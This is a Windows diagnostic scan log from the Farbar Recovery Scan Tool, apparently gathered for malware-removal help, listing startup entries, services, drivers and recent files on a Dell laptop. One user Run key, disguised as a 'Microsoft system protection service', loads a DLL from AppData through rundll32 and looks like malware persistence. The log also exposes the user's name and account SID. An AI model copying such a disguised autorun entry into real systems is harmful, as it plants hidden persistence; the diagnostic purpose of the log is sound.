HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3777696 2014-01-17] (Dell Inc.)
HKLM-x32\...\Run: [DropboxOEM] => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [462160 2014-09-02] ()
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Microsoft system protection service] => rundll32.exe "C:\Users\Melinda\AppData\Local\Microsoft\Protect\protecthost.dll",DllInstall
ShellIconOverlayIdentifiers: [DBRShellOverlayBackupFile] -> {831CEBDD-6BAF-4432-BE76-9E0989C14AEF} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconBackuped.dll [2015-12-08] (SoftThinks SAS)
ShellIconOverlayIdentifiers: [DBRShellOverlayModifiedBackupFile] -> {275E4FD7-21EF-45CF-A836-832E5D2CC1B3} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconNotBackuped.dll [2015-12-08] (SoftThinks SAS)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2015-06-07]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{28CEFB91-FA63-4200-9B83-6978147A71A0}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{812A2ED5-72C3-4457-9E4D-A562956307C8}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.za/
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-07-06] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-05-24] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-05-24] (McAfee, Inc.)

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-07-06] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-05-03] (Adobe Systems Inc.)

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-06-07] (Broadcom Corporation.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2944768 2016-06-10] (Microsoft Corporation)
R2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe [141704 2015-02-04] (Microsoft)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [119656 2016-01-15] (Dell)
S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [293440 2014-04-01] (Aviata, Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-01] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [989192 2016-05-24] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe [334608 2013-07-25] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\\McCSPServiceHost.exe [1903320 2016-04-18] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [795528 2016-04-20] (McAfee, Inc.)
S2 McOobeSv2; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-03-07] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-04-01] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-03-07] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1424352 2016-04-21] (McAfee, Inc.)
R2 My Dell Learning Center; C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe [22528 2015-01-22] () [File not signed]
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1029856 2016-04-21] (Intel Security, Inc.)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [253776 2013-07-30] (CyberLink)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2065808 2016-01-04] (SoftThinks SAS)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-06-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-06-07] (Microsoft Corporation)
S2 0106601467779372mcinstcleanup; C:\Windows\TEMP\010660~1.EXE -cleanup -nolog [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2015-06-07] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7569112 2015-06-07] (Broadcom Corporation)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-03-11] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-25] (OSR Open Systems Resources, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2016-03-11] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-03-11] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-03-11] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-03-11] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [842536 2016-03-11] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243496 2016-03-11] (McAfee, Inc.)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [42664 2015-01-10] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-06-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-06-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-06-07] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-06 19:32 - 2016-07-06 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-07-06 19:25 - 2016-07-06 19:26 - 00007949 _____ C:\Users\Melinda\Desktop\Fixlog.txt
2016-07-06 18:43 - 2016-07-06 18:43 - 00000000 ____D C:\Users\Melinda\Documents\CyberLink
2016-07-06 18:43 - 2016-07-06 18:43 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\CyberLink
2016-07-06 18:41 - 2016-07-06 18:41 - 00000000 ____D C:\Users\Melinda\AppData\Local\CyberLink
2016-07-06 17:12 - 2016-07-06 17:15 - 3532914688 _____ C:\Users\Melinda\Documents\Windows.iso
2016-07-06 16:17 - 2016-07-06 18:36 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-07-06 16:17 - 2016-07-06 16:17 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-07-06 14:48 - 2015-07-17 15:51 - 00984448 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00901264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2016-07-06 14:26 - 2016-07-06 14:26 - 00002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002437 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002401 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002400 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002394 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002388 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002380 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
2016-07-06 13:16 - 2016-07-06 13:16 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-07-06 12:36 - 2016-07-06 19:20 - 00000000 __RHD C:\ESD
2016-07-06 12:26 - 2016-07-06 12:26 - 00000000 ____D C:\Users\Melinda\AppData\Local\CEF
2016-07-06 12:25 - 2016-07-06 12:25 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-07-06 12:24 - 2016-07-06 12:24 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-07-06 12:24 - 2016-07-06 12:24 - 00002069 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2016-07-06 12:24 - 2016-07-06 12:24 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-07-06 12:23 - 2016-07-06 12:23 - 00000000 ____D C:\ProgramData\Adobe
2016-07-06 12:06 - 2016-07-06 12:06 - 00003510 _____ C:\Windows\System32\Tasks\{A79AE70B-3222-4200-AA0C-607D18CAF9F8}
2016-07-06 12:02 - 2016-07-06 12:02 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-07-06 11:59 - 2016-07-06 12:26 - 00000000 ____D C:\Users\Melinda\AppData\Local\Adobe
2016-07-06 10:57 - 2016-07-06 10:57 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-07-06 10:32 - 2016-07-06 10:32 - 00720403 _____ C:\Users\Melinda\Desktop\ZA_DirectorsRemunerationGuide_10062015.pdf
2016-07-06 10:22 - 2016-07-06 10:22 - 00281695 _____ C:\Users\Melinda\Desktop\Notice_20_of_2016.pdf
2016-07-06 09:57 - 2016-07-06 09:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-07-06 09:42 - 2016-07-06 09:42 - 00000000 ____D C:\Windows\System32\Tasks\Aviata
2016-07-06 09:08 - 2016-07-06 09:09 - 00024467 _____ C:\Users\Melinda\Desktop\Addition.txt
2016-07-06 09:07 - 2016-07-06 19:33 - 00014942 _____ C:\Users\Melinda\Desktop\FRST.txt
2016-07-06 09:06 - 2016-07-06 19:33 - 00000000 ____D C:\FRST
2016-07-06 09:04 - 2016-07-06 09:05 - 02390016 _____ (Farbar) C:\Users\Melinda\Desktop\FRST64.exe
2016-07-06 08:14 - 2016-07-06 08:14 - 00003068 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-07-06 08:14 - 2016-07-06 08:14 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-07-06 08:13 - 2016-07-06 08:13 - 00000000 ____D C:\ProgramData\Intel Security
2016-07-06 08:12 - 2016-07-06 08:12 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-07-06 07:58 - 2016-07-06 08:58 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-07-06 07:58 - 2016-07-06 07:58 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-06 07:57 - 2016-07-06 14:36 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3305678368-1645044794-3837945535-1001
2016-07-06 07:55 - 2016-07-06 07:55 - 00000000 ____D C:\Program Files (x86)\Dell Digital Delivery
2016-07-06 07:54 - 2016-07-06 07:54 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Macromedia
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieUserList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieSiteList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieBrowserModeList
2016-07-06 07:52 - 2016-07-06 12:26 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Adobe
2016-07-06 07:52 - 2016-07-06 08:02 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\DropboxOEM
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\Documents\Bluetooth Exchange Folder
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\DropboxOEM
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Broadcom
2016-07-06 06:43 - 2016-07-06 06:43 - 00000000 ____D C:\Users\Melinda\AppData\Local\Aviata
2016-07-06 06:37 - 2016-01-07 01:04 - 00000107 ____H C:\DBAR_Ver.txt
2016-07-06 06:34 - 2016-07-06 06:34 - 00003980 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003440 _____ C:\Windows\System32\Tasks\PCDEventLauncherTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003190 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2016-07-06 06:30 - 2016-07-06 06:30 - 00000000 ____D C:\Users\Melinda\AppData\Local\Power2Go8
2016-07-06 06:29 - 2016-07-06 06:29 - 00000144 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-07-06 06:29 - 2016-07-06 06:29 - 00000000 __SHD C:\Users\Melinda\IntelGraphicsProfiles
2016-07-06 06:28 - 2016-07-06 06:28 - 00000020 ___SH C:\Users\Melinda\ntuser.ini
2016-07-06 02:56 - 2016-07-06 06:37 - 00000000 ____D C:\ProgramData\softthinks
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\My Documents
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-07-05 19:48 - 2016-07-06 02:55 - 00000000 ____D C:\20160705194811_BACKUP
2016-06-10 04:48 - 2016-06-10 04:48 - 00635120 _____ (Microsoft Corporation) C:\Windows\system32\msvcp140.dll
2016-06-10 04:48 - 2016-06-10 04:48 - 00390408 _____ (Microsoft Corporation) C:\Windows\system32\vccorlib140.dll
2016-06-10 04:48 - 2016-06-10 04:48 - 00333080 _____ (Microsoft Corporation) C:\Windows\system32\concrt140.dll
2016-06-10 04:48 - 2016-06-10 04:48 - 00088816 _____ (Microsoft Corporation) C:\Windows\system32\vcruntime140.dll
2016-06-10 03:07 - 2016-06-10 03:07 - 00439536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp140.dll
2016-06-10 03:07 - 2016-06-10 03:07 - 00267008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vccorlib140.dll
2016-06-10 03:07 - 2016-06-10 03:07 - 00243480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\concrt140.dll
2016-06-10 03:07 - 2016-06-10 03:07 - 00085232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vcruntime140.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-06 19:32 - 2015-06-07 15:19 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2016-07-06 19:31 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2016-07-06 19:28 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-06 19:28 - 2013-08-22 16:44 - 00518000 _____ C:\Windows\system32\FNTCACHE.DAT
2016-07-06 19:27 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-07-06 19:26 - 2015-08-31 12:52 - 00000000 ____D C:\Users\Melinda\AppData\LocalLow\Temp
2016-07-06 18:43 - 2015-06-07 14:56 - 00000000 ____D C:\ProgramData\CyberLink
2016-07-06 18:37 - 2014-11-21 06:42 - 00863592 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-06 16:18 - 2015-06-07 15:15 - 00000000 ____D C:\ProgramData\McAfee
2016-07-06 14:48 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2016-07-06 14:47 - 2013-08-22 17:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-07-06 14:19 - 2015-06-07 15:14 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-07-06 13:16 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-07-06 11:19 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\rescache
2016-07-06 09:06 - 2015-06-07 15:13 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2016-07-06 09:06 - 2015-06-07 15:07 - 00000000 ____D C:\Program Files\Dell
2016-07-06 08:17 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files\Common Files\mcafee
2016-07-06 08:16 - 2013-08-22 17:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-07-06 08:16 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-07-06 08:08 - 2015-06-07 17:10 - 00000000 ____D C:\ProgramData\Dell
2016-07-06 07:52 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files (x86)\Dell Update
2016-07-06 07:51 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2016-07-06 06:40 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-07-06 06:34 - 2015-06-07 15:13 - 00000000 ____D C:\ProgramData\PCDr
2016-07-06 06:29 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda
2016-07-06 06:29 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-07-06 02:50 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\Web
2016-07-05 09:51 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Packages

==================== Files in the root of some directories =======

2015-06-07 14:43 - 2015-06-07 14:43 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-06-07 15:02 - 2015-06-07 15:02 - 0000121 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log
2015-06-07 14:57 - 2015-06-07 14:58 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
2015-06-07 14:58 - 2015-06-07 15:00 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log
2015-06-07 15:00 - 2015-06-07 15:02 - 0000108 _____ () C:\ProgramData\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}.log
2015-06-07 14:56 - 2015-06-07 14:57 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
